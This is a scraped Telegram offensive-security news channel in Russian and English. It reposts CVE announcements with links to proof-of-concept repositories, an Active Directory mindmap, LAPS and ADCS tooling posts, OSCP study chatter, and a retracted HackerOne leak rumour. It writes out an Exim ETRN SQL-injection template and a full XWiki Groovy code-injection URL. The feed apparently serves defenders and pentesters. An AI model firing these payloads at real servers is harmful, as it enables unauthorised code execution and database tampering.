Pentester's Backlog
592 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from APT
⚙️ Wazuh — Unsafe Deserialization RCE (CVE-2025-24016)

An unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.

🔗 Source:
https://github.com/0xjessie21/CVE-2025-24016

#wazuh #deserialization #rce #cve
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.


ETRN #',1); ## INSERT SQL HERE ## /*


Для устранения проблемы рекомендуется обновиться до версии 4.98.1.

Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
Forwarded from s0ld13r ch. (s0ld13r)
Появился POC на свежую уязвимость CVE-2025-21333 💀

Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege - локальный юзер может повысить привилегии до SYSTEM на хосте с активным Hyper-V 🔥

🔗 Repo: https://github.com/MrAle98/CVE-2025-21333-POC

P.S PoC не проверял

@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893

PoC:

<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20


https://github.com/advisories/GHSA-rr6p-3pfg-562j
Forwarded from SecuriXy.kz
Еще один SOC инструмент сдырявился следом за вазухом

🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.

Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.

Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:

xpack.integration_assistant.enabled: false
🤯1
Forwarded from Offensive Xwitter
😈 [ Mayfly @M4yFly ]

New Active Directory Mindmap v2025.03! 🚀

📖 Readable version:

🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg

🔧 Now fully generated from markdown files—way easier to update and maintain!

💡 Got improvements? PRs welcome! 👇

🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad

🐥 [ tweet ]
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
При эксплуатации уязвимостей ADCS могут возникать разные ошибки. В блоге подробно рассмотрены причины популярных ошибок, а также варианты решения этих проблем

https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/

#pentest #redteam #adcs
2
😳😳😳
🔥10👍21
В общем и целом это было не сказать бы что сложно.

Весь цикл от начала обучения до сдачи экзамен занял 3 месяца - при этом, времени на активное обучение было потрачено от силы 20-30 дней (праздники, проекты на работе, все дела).

Не хочу сильно вдаваться в подробности экзамена в этом посте, но я ещё не видел на просторах infosec-комьюнити пост/статьи о сдаче именно OSCP+ сертификата (а я, напомню, что под этот формат произошли небольшие изменения в процессе сдачи).

Исходя из этого, у меня к вам вопрос: хотите ли вы увидеть небольшую выписку (статей на хабре и так уже много) о моих впечатлениях от обучения/экзаменационного процесса и о формате сдачи экзамена в 2025 году?
Писать статейку?
Anonymous Poll
81%
Да
6%
Нет
13%
Хочу увидеть результаты
Forwarded from AP Security
#soc

Свежие индикаторы компрометации: NTLM Relay Attack

Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
👍1
Forwarded from 1N73LL1G3NC3
🍊 GoLAPS

Retrieve LAPS passwords from a domain. The tools is inspired in pyLAPS.

Blog: https://sensepost.com/blog/2025/golaps/
🔥1
У BugBounty-платформы HackerOne утечка всех ее пользователей, включая пароли доступа к платформе 🔠 Так что, если вы пользователь этой платформы, то впору сменить свои реквизиты доступа к системе 🤒

Кстати, как вы думаете 🤔, что можно сделать, если узнать ваш пароль доступа к BugBounty-платформе? Узнать сумму ваших вознаграждения? Получить доступ ко всем вашим отчетам? Вывести все средства на подставные счета? 🤒 Что-то еще?

#утечка #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Галя, у нас отмена по утечке!
🔥1
Forwarded from Cult Of Wire
Тут у Лукацкого появился пост, что HackerOne поломали, креды утекли и вообще всё пропало.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.
🏆 Трипл-пивотинг, сплошной бэктрекинг, куча (ПРОСТО КУЧА) тачек, до которых нужно дорваться и при этом совсем не сложные уязвимости на всех машинах.

Я однозначно рекомендую HTB ProLabs "Dante" тем, кто планирует сдавать OSCP!
👍4
Как это выглядит / Как это ощущается

Мне определенно нужна парочка выходных после этой пролабы
🔥4😁2🤯1